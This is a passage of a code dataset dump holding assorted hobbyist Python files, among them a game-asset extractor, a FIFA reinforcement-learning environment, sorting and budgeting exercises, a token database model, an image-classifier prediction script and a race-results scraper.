range(vertex_n+1) ] \r\n\r\nfor _ in range(edge_n):\r\n a, b = map(int, input().split())\r\n graph[a][b] = True\r\n graph[b][a] = True\r\n\r\nfor _ in range(int(input())):\r\n n, *arr = map(int, input().split())\r\n if judge(n, arr, vertex_n):\r\n print('YES')\r\n else:\r\n print('NO')\r\n","repo_name":"zhangpeng96/Programming-Ability-Practice","sub_path":"PAT-A/a1122-hamiltonian-cycle/python-a1122.py","file_name":"python-a1122.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"450907856","text":"# -*- coding: utf-8 -*-\n\n# Tested on Python 3.8.0\n# This tool should be used with Silent Hill: Orphan (Java)\n\n# Ver Date Author\n# v0.1 17.04.2020 Bartlomiej Duda\n# v0.2 17.04.2020 Bartlomiej Duda\n\n\n\n\nVERSION_NUM = \"v0.2\"\n\nimport os\nimport sys\nimport struct\n\n\n\ndef bd_logger(in_str):\n import datetime\n now = datetime.datetime.now()\n print(now.strftime(\"%d-%m-%Y %H:%M:%S\") + \" \" + in_str) \n \n\n\ndef export_bin(in_BIN_filepath, out_folder_path):\n '''\n Function for exporting data from BIN files\n ''' \n bd_logger(\"Starting export_bin...\") \n \n bin_file = open(in_BIN_filepath, 'rb')\n \n num_of_chunks = struct.unpack('b', bin_file.read(1))[0]\n print(\"num_of_chunks: \" + str(num_of_chunks) )\n \n \n #read chunks\n for i in range(num_of_chunks):\n chunk_name_length = struct.unpack('>b', bin_file.read(1))[0]\n chunk_name = bin_file.read(chunk_name_length).decode(\"utf8\")\n #print( str(i+1) + \") chunk_name: \" + chunk_name)\n data_size = struct.unpack('>h', bin_file.read(2))[0]\n \n if data_size == 0:\n continue\n else:\n data = bin_file.read(data_size)\n out_path = out_folder_path + \"\\\\\" + chunk_name.replace(\"/\", \"\\\\\") \n print(str(i+1) + \") out: \" + out_path)\n \n if not os.path.exists(os.path.dirname(out_path)):\n try:\n os.makedirs(os.path.dirname(out_path))\n except:\n pass\n \n #write data \n out_file = open(out_path, 'wb+')\n out_file.write(data)\n out_file.close()\n \n \n \n bin_file.close()\n bd_logger(\"Ending export_bin...\") \n \n \n \n \ndef main():\n \n main_switch = 3\n # 1 - bin export \n # 2 - all bins export\n # 3 - all bins export to the same folder\n \n \n bin_arr = [ \"0.bin\", \"1.bin\", \"2.bin\", \"3.bin\", 
\"4.bin\", \"5.bin\", \"6.bin\", \"7.bin\", \"8.bin\", \"9.bin\", \"a.bin\", \"b.bin\", \"c.bin\", \"d.bin\", \"e.bin\", \"f.bin\" ] \n bin_fold = \"C:\\\\Users\\\\Arek\\\\Desktop\\\\Silent_Hill_Orphan_SPOL\\\\JAR_out\\\\chunks\\\\\"\n \n \n if main_switch == 1:\n p_in_BIN_filepath = \"C:\\\\Users\\\\Arek\\\\Desktop\\\\Silent_Hill_Orphan_SPOL\\\\JAR_out\\\\chunks\\\\0.bin\"\n p_out_folder_path = \"C:\\\\Users\\\\Arek\\\\Desktop\\\\Silent_Hill_Orphan_SPOL\\\\JAR_out\\\\chunks\\\\0.bin_out\"\n export_bin(p_in_BIN_filepath, p_out_folder_path)\n \n elif main_switch == 2:\n for f_bin in bin_arr:\n bin_path = bin_fold + f_bin \n out_path = bin_fold + f_bin + \"_out\"\n export_bin(bin_path, out_path) \n \n elif main_switch == 3:\n for f_bin in bin_arr:\n bin_path = bin_fold + f_bin \n out_path = bin_fold + \"OUT\"\n export_bin(bin_path, out_path) \n\n \n else:\n print(\"Wrong option selected!\")\n \n \n \n bd_logger(\"End of main...\") \n \n \n \nmain()","repo_name":"bartlomiejduda/Tools","sub_path":"NEW Tools/Silent Hill Orphan/Silent_Hill_Orphan_BIN_Tool.py","file_name":"Silent_Hill_Orphan_BIN_Tool.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":109,"dataset":"github-code","pt":"78"} +{"seq_id":"32562519228","text":"def DetermineIfMinCreditsObtained(Income):\n\n # Unpack needed dicts\n IncomeYears = Income['IncomeYears']\n IncomeArray = Income['IncomeArray']\n\n # Amounts needed to earn one quarter of coverage (one credit) for each year from 1978 to 2023:\n # Table provided at https://www.ssa.gov/oact/cola/QC.html\n YearsArray = list(range(1978, 2024))\n CreditCost = [250, 260, 290, 310, 340, 370, 390, 410, 440, 460, 470, 500, 520, 540, 570, 590, 620, 630, 640, 670,\n 700, 740, 780, 830, 870, 890, 900, 920, 970, 1000, 1050, 1090, 1120, 1120, 1130, 1160, 1200, 1220,\n 1260, 1300, 1320, 1360, 1410, 1470, 1510, 1640]\n\n # Initialize\n TotalCredits = 0\n\n # Loop over income years\n for ct in range(len(IncomeYears)):\n\n # Determine credit cost for this year\n Year = IncomeYears[ct]\n # If year is within YearsArray, grab corresponding index:\n if Year <= YearsArray[-1]:\n ind = YearsArray.index(Year)\n else: # use the credit cost for the final year listed\n ind = len(YearsArray) - 1\n CreditCostThisYear = CreditCost[ind]\n\n NumCreditsThisYear = int(IncomeArray[ct] / CreditCostThisYear)\n if NumCreditsThisYear > 4: # maximum number of credits each year is 4\n NumCreditsThisYear = 4\n\n TotalCredits += NumCreditsThisYear\n\n if TotalCredits >= 40:\n MinCreditsObtained = True\n else: MinCreditsObtained = False\n\n return MinCreditsObtained, TotalCredits\n","repo_name":"EngineeringYourFI/master","sub_path":"SocialSecurityIncome/DetermineIfMinCreditsObtained.py","file_name":"DetermineIfMinCreditsObtained.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"72803554171","text":"import pytesseract as pt\nfrom Network_model import *\nfrom PIL import Image\nfrom Keyboard_mapping_and_screen_shot import *\nimport numpy as np\nimport time\nimport torch\nfrom torchvision.transforms import transforms\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset\nclass myDataloader(Dataset):\n def __init__(self, data):\n self.data = data\n def __len__(self):\n return len(self.data)\n def __getitem__(self, item):\n return self.data[item]\n\nclass FIFA(object):\n \"\"\"\n This class acts as the intermediate \"API\" to the actual game. 
Double quotes API because we are not touching the\n game's actual code. It interacts with the game simply using screen-grab (input) and keypress simulation (output)\n using some clever python libraries.\n \"\"\"\n\n def __init__(self, max_memory=100000, discount=.9):\n self.feature_map = FeatureMap()\n self.reward = 0\n self.max_memory = max_memory\n self.memory = list()\n self.discount = discount\n self.rewarder = Get_Reward()\n\n def _get_reward(self):\n\n reward_screen = grab_screen(region=(460, 0, 1080, 1080))\n feature_extract = self.feature_map.FeatureExtract(reward_screen)\n ingame_reward = self.rewarder.send_reward(feature_extract)\n return ingame_reward\n\n def observe(self):\n print('\\n\\nobserve')\n restart_button = grab_screen((552, 815, 200, 100))\n buttom_image = Image.fromarray(restart_button.astype('uint8'), 'RGB')\n restart_text = pt.image_to_string(buttom_image)\n if \"RETRY DRILL\" in restart_text:\n # press enter key\n print('pressing enter, reset reward')\n self.reward = 0\n PressKey(leftarrow)\n time.sleep(0.4)\n ReleaseKey(leftarrow)\n PressKey(enter)\n time.sleep(0.4)\n ReleaseKey(enter)\n time.sleep(2)\n # get current state s from screen using screen-grab\n screen = grab_screen(region=(460, 0, 1080, 1080))\n # process through FeatureMap to get the feature map from the raw image\n state = self.feature_map.FeatureExtract(screen)\n return state\n\n def act(self, action):\n display_action = [\"leftarrow\", \"leftarrow\", \"leftarrow\", \"rightarrow\", \"rightarrow\", \"rightarrow\",\n \"uparrow\", \"uparrow\", \"uparrow\", \"downarrow\", \"downarrow\", \"downarrow\", \"spacebar\", \"Q\", \"W\",\n \"E\", \"F\"]\n print('action: ' + str(display_action[action]))\n keys_to_press = [[leftarrow], [leftarrow], [leftarrow], [rightarrow], [rightarrow], [rightarrow],\n [uparrow], [uparrow], [uparrow], [downarrow], [downarrow], [downarrow], [spacebar], [Q], [W],\n [E], [F]]\n short_action = [0, 3, 6, 9]\n medium_action = [1, 4, 7, 10]\n long_action = [2, 5, 8, 11]\n move = np.arange(0, 12, 1)\n # need to keep all keys pressed for some time before releasing them otherwise fifa considers them as accidental\n # key presses.\n for key in keys_to_press[action]:\n if action in move:\n PressKey(key)\n if action in short_action:\n time.sleep(1)\n if action in medium_action:\n time.sleep(5)\n if action in long_action:\n time.sleep(10)\n PressKey(Q)\n time.sleep(0.2)\n ReleaseKey(Q)\n if action in [12, 13, 14,15]: # transient a ball to other player or shot the ball, then we choose to move a distance and transmit the ball again\n PressKey(key)\n sub_action = np.random.choice(move)\n if sub_action in move:\n PressKey(keys_to_press[sub_action][0])\n if sub_action in short_action:\n time.sleep(1)\n if sub_action in medium_action:\n time.sleep(5)\n if sub_action in long_action:\n time.sleep(10)\n PressKey(Q)\n time.sleep(0.2)\n ReleaseKey(Q)\n ReleaseKey(keys_to_press[sub_action][0])\n for key in keys_to_press[action]:\n ReleaseKey(key)\n # wait until some time after taking action\n\n reward = self._get_reward()\n return self.observe(), reward\n\n def reset(self):\n return 0\n\n def remember(self, states):\n # Save a state to memory\n self.memory.append(states)\n # We don't want to store infinite memories, so if we have too many, we just delete the oldest one\n if len(self.memory) > self.max_memory:\n del self.memory[0]\n\n def get_batch(self, model, target_net, batch_size=10, game_over=False):\n\n # How many experiences do we have?\n len_memory = len(self.memory)\n\n num_actions = 17\n\n # 
Dimensions of the game field\n env_dim = self.memory[0][0].shape[1]\n\n # We want to return an input and target vector with inputs from an observed state...\n inputs = np.zeros((min(len_memory, batch_size), env_dim))\n\n # ...and the target r + gamma * max Q(s’,a’)\n # Note that our target is a matrix, with possible fields not only for the action taken but also\n # for the other possible actions. The actions not take the same value as the prediction to not affect them\n targets = np.zeros((inputs.shape[0], num_actions))\n model.eval()\n target_net.eval()\n # We draw states to learn from randomly\n for i, idx in enumerate(np.random.randint(0, len_memory,\n size=inputs.shape[0])):\n \"\"\"\n Here we load one transition <s, a, r, s’> from memory\n state_t: initial state s\n action_t: action taken a\n reward_t: reward earned r\n state_tp1: the state that followed s’\n \"\"\"\n state_t, action_t, reward_t, state_tp1 = self.memory[idx]\n\n\n # add the state s to the input\n inputs[i:i + 1] = state_t\n\n # First we fill the target values with the predictions of the model.\n # They will not be affected by training (since the training loss for them is 0)\n # state_t = self.transform_numpy(state_t)\n # state_t = Variable(torch.from_numpy(state_t))\n state_t = torch.Tensor(state_t).float()\n with torch.no_grad():\n targets[i] = model(state_t)\n\n\n \"\"\"\n If the game ended, the expected reward Q(s,a) should be the final reward r.\n Otherwise the target value is r + gamma * max Q(s’,a’)\n \"\"\"\n # Here Q_sa is max_a'Q(s', a')\n state_tp1 = torch.Tensor(state_tp1).float()\n with torch.no_grad():\n action_tp1 = np.argmax(model(state_tp1).numpy())\n Q_sa = target_net(state_tp1).numpy()[0][action_tp1]\n # if the game ended, the reward is the final reward\n if game_over: # if game_over is True\n targets[i, action_t] = reward_t\n else:\n # r + gamma * max Q(s’,a’)\n targets[i, action_t] = reward_t + self.discount * Q_sa\n return inputs, targets\n\n","repo_name":"CoderNoMercy/FIFA_PLAY_WHOLE_GAME","sub_path":"ENV_Create.py","file_name":"ENV_Create.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37646904434","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n'''\n@File : bubble_sort_simultaneous.py\n@Time : 2023/02/27 13:53:39\n@Author : komorebi \n'''\n\n\"\"\"\nA bubble sort can be modified to “bubble” in both directions. \nThe first pass moves “up” the list, and the second pass moves “down.” \nThis alternating pattern continues until no more passes are necessary. 
\nImplement this variation .\n\"\"\"\nimport random\ndef bubble_sort(li:list) -> None:\n \"\"\"\n sort from two directions\n from left to right to find the largest number during first loop duration\n then the second largest \n from right to left to find the smallest number during first loop duration\n then the second smallest\n until the list is sorted, stop looping \n \"\"\"\n for i in range(len(li) - 1):\n need_swap = False\n for j in range(len(li) - 1 - i): # start from left\n if li[j] > li[j+1]: # if current value > next right value, swap them\n need_swap = True\n li[j], li[j+1] = li[j+1], li[j]\n print('up',li)\n need_swap = False\n for x in range(len(li) - 2 - i, 0 , -1): # start from right\n if li[x] < li[x-1]: # if current value < next left value, swap them\n need_swap = True\n li[x-1], li[x] = li[x], li[x-1]\n print('down',li)\n if need_swap == False: # list is sorted\n break\n\nif __name__ == '__main__':\n li = [0,1,2,3,4,5,6,7,8,9]\n random.shuffle(li)\n print(li)\n bubble_sort(li)\n print(li)","repo_name":"lost-komorebi/Data-Structures-and-Algorithms-Python-Coding","sub_path":"sort/exercise/bubble_sort_in_both_directions.py","file_name":"bubble_sort_in_both_directions.py","file_ext":"py","file_size_in_byte":1537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38785882653","text":"from dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import TYPE_CHECKING\n\nfrom ..errors import RowDontExistException\n\nif TYPE_CHECKING:\n from sqlite3 import Connection\n\n\n@dataclass\nclass Token:\n id: int\n refresh_token: str\n token: str\n expires_in: int\n created: datetime\n\n\nclass TokenModel:\n def __init__(self, db: 'Connection'):\n self._db = db\n self._cursor = db.cursor()\n\n def insert(self, refresh_token: str, token: str, expires_in=1800) -> int:\n insert_query = '''\n INSERT INTO token (refresh_token, token, expires_in)\n VALUES (?, ?, ?);\n '''\n self._cursor.execute(insert_query, [refresh_token, token, expires_in])\n self._db.commit()\n return self._cursor.lastrowid\n\n def get_by_id(self, token_id: int) -> Token:\n select_query = '''\n SELECT id, refresh_token, token, expires_in, created\n FROM token\n WHERE id = ?\n LIMIT 1;\n '''\n self._cursor.execute(select_query, [token_id])\n token_row = self._cursor.fetchone()\n if not token_row:\n raise RowDontExistException(f\"Token with id {token_id} do not exist\")\n return Token(*token_row)\n\n def get_by_token_or_refresh_token(self, token: str = None, refresh_token: str = None):\n select_query = '''\n SELECT id, refresh_token, token, expires_in, created\n FROM token\n WHERE token=? 
OR refresh_token=?\n LIMIT 1;\n '''\n self._cursor.execute(select_query, [token, refresh_token])\n token_row = self._cursor.fetchone()\n if not token_row:\n raise RowDontExistException(f\"Token with id {token} do not exist\")\n return Token(*token_row)\n\n def get_latest_token(self) -> Token:\n select_query = '''\n SELECT id, refresh_token, token, expires_in, created\n FROM token\n ORDER BY created DESC\n LIMIT 1;\n '''\n self._cursor.execute(select_query)\n token_row = self._cursor.fetchone()\n if not token_row:\n raise RowDontExistException(\"table token is empty\")\n return Token(*token_row)\n","repo_name":"tartancz/YoutubeCodeFarmer","sub_path":"database/models/token.py","file_name":"token.py","file_ext":"py","file_size_in_byte":2219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42180135407","text":"import os\n\nos.environ['OMP_NUM_THREADS'] = '1'\nimport paddle\nfrom model import Model\nfrom env import create_train_env\nimport paddle.nn.functional as F\nfrom gym_super_mario_bros.actions import SIMPLE_MOVEMENT, COMPLEX_MOVEMENT, RIGHT_ONLY\nfrom visualdl import LogWriter\nimport hashlib\n\n\n# 评估模型\ndef eval(args, num_states, num_actions):\n log_writer = LogWriter(logdir='log')\n # 固定初始化状态\n paddle.seed(123)\n # 使用 GPU预测\n if paddle.is_compiled_with_cuda():\n paddle.set_device(\"gpu:0\")\n # 判断游戏动作类型\n if args.action_type == \"right\":\n actions = RIGHT_ONLY\n elif args.action_type == \"simple\":\n actions = SIMPLE_MOVEMENT\n else:\n actions = COMPLEX_MOVEMENT\n # 创建游戏动作\n env = create_train_env(args.world, args.stage, actions)\n # 获取网络模型\n local_model = Model(num_states, num_actions)\n # 切换为评估状态\n local_model.eval()\n # 将图像转换为Paddle的数据类型\n state = paddle.to_tensor(env.reset(), dtype=\"float32\")\n # 一开始就更新模型参数\n done = True\n # 日志的记录步数\n step = 0\n # 旧模型的MD5\n old_model_file_md5 = ''\n # 游戏总得分\n total_reward = 0\n while True:\n # 每结束一次就更新模型参数\n if done:\n try:\n model_path = \"{}/model_{}_{}.pdparams\".format(args.saved_path, args.world, args.stage)\n # 使用文件的MD5保证每个模型只用一次\n with open(model_path, 'rb') as f:\n file = f.read()\n file_md5 = hashlib.md5(file).hexdigest()\n if file_md5 == old_model_file_md5:\n continue\n else:\n model_dict = paddle.load(model_path)\n old_model_file_md5 = file_md5\n except:\n continue\n total_reward = 0\n local_model.load_dict(model_dict)\n # 预测动作概率和评估值\n logits, value = local_model(state)\n # 获取动作的序号\n policy = F.softmax(logits, axis=1)\n action = paddle.argmax(policy)[0]\n # 执行游戏\n state, reward, done, info = env.step(int(action))\n total_reward += reward\n # 显示界面\n if args.show_play:\n env.render()\n # 游戏通关\n if info[\"flag_get\"]:\n print(\"World {} stage {} 通关\".format(args.world, args.stage))\n paddle.save(local_model.state_dict(),\n \"{}/model_{}_{}_finish.pdparams\".format(args.saved_path, args.world, args.stage))\n # 重置游戏状态\n if done:\n step += 1\n state = env.reset()\n print('总得分是:%f' % total_reward)\n log_writer.add_scalar(tag='Eval reward', value=total_reward, step=step)\n # 转换每一步都游戏状态\n state = paddle.to_tensor(state, dtype=\"float32\")\n\n\ndef print_arguments(args):\n print(\"----------- Configuration Arguments -----------\")\n for arg, value in sorted(vars(args).items()):\n print(\"%s: %s\" % (arg, value))\n 
print(\"------------------------------------------------\")\n","repo_name":"yeyupiaoling/ReinforcementLearning","sub_path":"PPO-SuperMarioBros/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"78"} +{"seq_id":"10152382219","text":"import numpy as np\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sb\r\n\r\nimport torch\r\nfrom torch import nn\r\nfrom torch import optim\r\nimport torch.nn.functional as F\r\nfrom torchvision import datasets, transforms, models\r\nfrom PIL import Image\r\nimport json\r\nimport argparse\r\nimport sys\r\n\r\nfrom collections import OrderedDict\r\n\r\n# A function that loads a checkpoint and rebuilds the model\r\ndef load_checkpoint(filepath):\r\n checkpoint = torch.load(filepath)\r\n model = models.vgg19(pretrained = True)\r\n model.class_to_idx = checkpoint['class_to_idx']\r\n classifier = nn.Sequential(OrderedDict([('fc1', nn.Linear(25088, 4096)),\r\n ('relu', nn.ReLU()),\r\n ('drop', nn.Dropout(p = 0.5)),\r\n ('fc2', nn.Linear(4096, 102)),\r\n ('output', nn.LogSoftmax(dim = 1))]))\r\n model.classifier = classifier\r\n model.load_state_dict(checkpoint['model_state_dict'])\r\n return model\r\n\r\n# A function that pre-processes the image so it can be used as input for the model.\r\ndef process_image(image_path):\r\n ''' Scales, crops, and normalizes a PIL image for a PyTorch model,\r\n returns an Numpy array\r\n '''\r\n # Process a PIL image for use in a PyTorch model\r\n pil_image = Image.open(image_path)\r\n \r\n # Resize with Aspect Ratio maintained\r\n # First fixing the short axes\r\n if pil_image.width > pil_image.height:\r\n (width, height) = (int(pil_image.width / pil_image.height) * 256, 256)\r\n else:\r\n (width, height) = (256, int(pil_image.height / pil_image.width) * 256)\r\n pil_image = pil_image.resize((width, height))\r\n \r\n # Crop\r\n left = (pil_image.width - 224) / 2\r\n bottom = (pil_image.height - 224) / 2\r\n right = left + 224\r\n top = bottom + 224\r\n \r\n pil_image = pil_image.crop((left, bottom, right, top))\r\n \r\n # Convert to np then Normalize\r\n np_image = np.array(pil_image) / 255\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n np_image = (np_image - mean) / std\r\n \r\n # Transpose to fit PyTorch Axes\r\n np_image = np_image.transpose([2, 0, 1])\r\n \r\n return np_image\r\n\r\n\r\n# A function converts a PyTorch tensor and displays it\r\ndef imshow(image, ax=None, title=None):\r\n \"\"\"Imshow for Tensor.\"\"\"\r\n if ax is None:\r\n fig, ax = plt.subplots()\r\n if title is not None:\r\n ax.set_title(title)\r\n \r\n # PyTorch tensors assume the color channel is the first dimension\r\n # but matplotlib assumes is the third dimension\r\n image = image.transpose((1, 2, 0))\r\n \r\n # Undo preprocessing\r\n mean = np.array([0.485, 0.456, 0.406])\r\n std = np.array([0.229, 0.224, 0.225])\r\n image = std * image + mean\r\n \r\n # Image needs to be clipped between 0 and 1 or it looks like noise when displayed\r\n image = np.clip(image, 0, 1)\r\n \r\n ax.imshow(image)\r\n \r\n return ax\r\n\r\n# A function for making predictions with model\r\ndef predict(image_path, model, topk=5):\r\n ''' Predict the class (or classes) of an image using a trained deep learning model.\r\n '''\r\n # Implement the code to predict the class from an image file\r\n img = process_image(image_path)\r\n \r\n # Convert np_img to PT tensor and send to GPU\r\n pt_img = 
torch.from_numpy(img).type(torch.cuda.FloatTensor)\r\n \r\n # Unsqueeze to get shape of tensor from [Ch, H, W] to [Batch, Ch, H, W]\r\n pt_img = pt_img.unsqueeze(0)\r\n\r\n # Run the model to predict\r\n output = model.forward(pt_img)\r\n \r\n probs = torch.exp(output)\r\n \r\n # Pick out the topk from all classes \r\n top_probs, top_indices = probs.topk(topk)\r\n \r\n # Convert to list on CPU without grads\r\n top_probs = top_probs.detach().type(torch.FloatTensor).numpy().tolist()[0]\r\n top_indices = top_indices.detach().type(torch.FloatTensor).numpy().tolist()[0]\r\n \r\n # Invert the class_to_idx dict to a idx_to_class dict\r\n idx_to_class = {value: key for key, value in model.class_to_idx.items()}\r\n \r\n top_classname = {idx_to_class[index] for index in top_indices}\r\n \r\n return top_probs, top_classname\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # Input\r\n\r\n # Class labelling\r\n with open('cat_to_name.json', 'r') as f:\r\n cat_to_name = json.load(f)\r\n \r\n device = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\n print(f'Now the device is set to {device}')\r\n\r\n # Load checkpoint\r\n print('*** Loading checkpoint ***')\r\n model = load_checkpoint(saved_pth=sys.argv[2])\r\n\r\n # -----------------------------^^^^^^ INFERENCE STAGE ^^^^^^^----------------------------------- #\r\n print('*** Inference Stage ***')\r\n\r\n # Plot flower input image\r\n print('*** Input image ***')\r\n plt.figure(figsize = (6,10))\r\n plot_1 = plt.subplot(2,1,1)\r\n\r\n image = process_image(sys.argv[1])\r\n\r\n #flower_name = cat_to_name['21']\r\n\r\n imshow(image, plot_1)\r\n\r\n # Prediction with model\r\n model.to(device)\r\n probs, classes = predict(image_path=sys.argv[1], model=model, topk=5) \r\n print(probs)\r\n print(classes)\r\n\r\n print('*** Prediction result ***')\r\n # Convert from the class integer encoding to actual flower names\r\n flower_names = [cat_to_name[i] for i in classes]\r\n\r\n # Plot the probabilities for the top 5 classes as a bar graph\r\n plt.subplot(2,1,2)\r\n\r\n sb.barplot(x=probs, y=flower_names, color=sb.color_palette()[0])\r\n\r\n plt.show()","repo_name":"voduyquoc/Image-Classifier-using-CNN","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"18593034629","text":"from django.contrib import admin\nfrom django.utils.html import format_html\nfrom places.models import Place, Image\nfrom adminsortable2.admin import SortableInlineAdminMixin\n\n\nclass ImageInline(SortableInlineAdminMixin, admin.TabularInline):\n model = Image\n readonly_fields = ('preview',)\n extra = 0\n\n def preview(self, image):\n url = image.file.url\n return format_html('<img src=\"{}\" height={} />', url, 200)\n\n fields = ('position', 'file', 'preview')\n\n\n@admin.register(Place)\nclass PlaceAdmin(admin.ModelAdmin):\n inlines = [\n ImageInline,\n ]\n","repo_name":"Kosmostars7403/Yandex-Afisha","sub_path":"places/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"31615631289","text":"class Category:\n\n def __init__(self, name):\n self.name = name\n self.ledger = []\n self.budget = 0\n self.withdraws = 0\n\n def deposit(self, amount, description = \"\"):\n self.amount = amount\n self.ledger.append({\"amount\": self.amount, \"description\": description})\n self.budget += amount\n\n def 
withdraw(self, amount, description = \"\"):\n if self.check_funds(amount) == True:\n self.ledger.append({\"amount\": -1 * amount , \"description\": description})\n self.budget -= amount\n self.withdraws += amount\n return True\n else:\n return False\n\n def get_balance(self):\n return self.budget\n\n def check_funds(self, amount):\n if self.budget >= amount:\n # print(\"TRUE\")\n return True\n else:\n # print(\"FALSE\")\n return False\n\n\n def transfer(self, amount, category):\n category.deposit(amount, \"Transfer from \" + str(self.name))\n return self.withdraw(amount, \"Transfer to \" + str(category.name))\n \n \n def __str__(self):\n\n title = self.name.center(30, \"*\") + \"\\n\"\n transactions = \"\"\n for transaction in self.ledger:\n \n if len(transaction['description']) < 23:\n spaces = (30 - len(str(transaction['description']) + format(transaction['amount'], '.2f'))) * \" \"\n transactions += str(transaction['description']) + spaces + format(transaction['amount'], '.2f') + \"\\n\"\n else:\n transactions += str(transaction['description'])[0:23] + (7 - len(format(transaction['amount'], '.2f'))) * \" \" + format(transaction['amount'], '.2f') + \"\\n\"\n \n total = \"Total: \" + str(self.budget) \n balance = title + transactions + total \n\n return balance\n\n \ndef create_spend_chart(categories):\n \n # Calculing the percentages from each category\n \n total_expenses = 0\n strings = []\n \n for category in categories:\n total_expenses += category.withdraws\n strings.append(category.name) # Create a list with the names of each category\n\n\n pct_category = []\n\n for category in categories:\n pct_category.append(round(category.withdraws/total_expenses * 100, 0))\n \n # print(pct_category)\n rounded = []\n for pct in pct_category:\n if pct < 10:\n rounded.append(0)\n elif (pct % 10) / 10 > 0.5:\n rounded.append((pct // 10 + 1) * 10 )\n else:\n rounded.append((pct // 10) * 10 )\n\n \n # print(rounded)\n\n \n # Starts the string\n title = \"Percentage spent by category\\n\"\n\n percentages = [\"100| \", \" 90| \", \" 80| \", \" 70| \", \" 60| \", \n \" 50| \", \" 40| \", \" 30| \", \" 20| \", \" 10| \", \n \" 0| \"]\n\n\n expenses = \"\"\n counter = 110\n\n ## Graphs the points ans spaces\n \n for percentage in percentages:\n \n counter = counter - 10\n expenses += percentage \n\n for value in rounded:\n if counter > value:\n expenses += \" \"\n else:\n expenses += \"o \"\n \n expenses += \"\\n\"\n\n # Graphs the lines for the report\n line = (\" \"* 4) + \"-\" + (\"---\"* len(rounded)) + \"\\n\"\n\n # Graph the word below each percentage\n ## Finds the longest word in the string list\n longest = 0\n for text in strings:\n if len(text) > longest:\n longest = len(text)\n \n ## Normalize each word to get the same len to all the categogies\n for i in range(len(strings)):\n strings[i] = strings[i] + \" \" * (longest - len(strings[i]))\n\n \n ## Prints each letter.\n bottom = \"\"\n \n for i in range(len(strings[0])):\n bottom += \" \"\n for text in strings:\n bottom += \" \" + text[i] + \" \"\n \n bottom += \" \\n\"\n \n bottom = bottom.rstrip() + \" \"\n \n return title + expenses + line + bottom\n\n \n","repo_name":"YosefGuevara012/Budget_APP_FCC","sub_path":"budget.py","file_name":"budget.py","file_ext":"py","file_size_in_byte":3924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38711358894","text":"\"\"\"\nTry out Tkinter and ttk!\n\"\"\"\n\nimport tkinter\nfrom tkinter import ttk\nimport random\n\n\ndef main():\n # Make a 
window.\n # Put a Frame on it.\n # Put a Button on the frame.\n # Make your Button do something simple.\n # Add a Label and an Entry.\n # Make your Button do something with the Label and Entry.\n pass\n\n root = tkinter.Tk()\n\n main_frame = ttk.Frame(root, padding=(50), relief='raised')\n main_frame.grid()\n\n label = ttk.Label(main_frame, text='hello')\n label.grid()\n\n button = ttk.Button(main_frame, text='hello')\n button.grid()\n button['command'] = lambda: change_label(root, label, button)\n\n entry = ttk.Entry(main_frame, width=8)\n entry.grid()\n\n button2 = ttk.Button(main_frame, text='print number **10')\n button2.grid()\n button2['command'] = lambda: number_10th(entry, main_frame)\n\n root.mainloop()\n\ndef change_label(root, label, change_label_button):\n new_label = ''\n for k in range(8):\n new_label = new_label + chr(ord('A') + random.randrange(26))\n label['text'] = new_label\n\ndef number_10th(entry, frame):\n number = int(entry.get())\n new_number = number ** 10\n new_label = ttk.Label(frame, text='')\n new_label['text'] = str(new_number)\n new_label.grid()\n\n# ----------------------------------------------------------------------\n# If this module is running at the top level (as opposed to being\n# imported by another module), then call the 'main' function.\n# ----------------------------------------------------------------------\nif __name__ == '__main__':\n main()\n","repo_name":"Goldabj/IntroToProgramming","sub_path":"Tkinter_ttk/src/m99.py","file_name":"m99.py","file_ext":"py","file_size_in_byte":1571,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"45884781954","text":"# import libraries\nimport urllib2\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport sys\n\n#Add new urls to list\n# be sure to add filters (AG and male)\n# then go to page 2 to get the correct url.\n# then do the same thing for all years wanted\n# then replace the p=2 with p={page_nr}\n##the reason the webpages are listed instead of iterating through is because dates change and not just locations\nurl_list = [\"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20180428&agegroup=30-34&sex=M&y=2018&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20170422&agegroup=30-34&sex=M&y=2017&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20160514&agegroup=30-34&sex=M&y=2016&ps=20#axzz5FMGvgHL2\",\n \"http://www.ironman.com/triathlon/events/americas/ironman/texas/results.aspx?p={page_nr}&race=texas&rd=20150516&agegroup=30-34&sex=M&y=2015&ps=20#axzz5FMGvgHL2\",\n 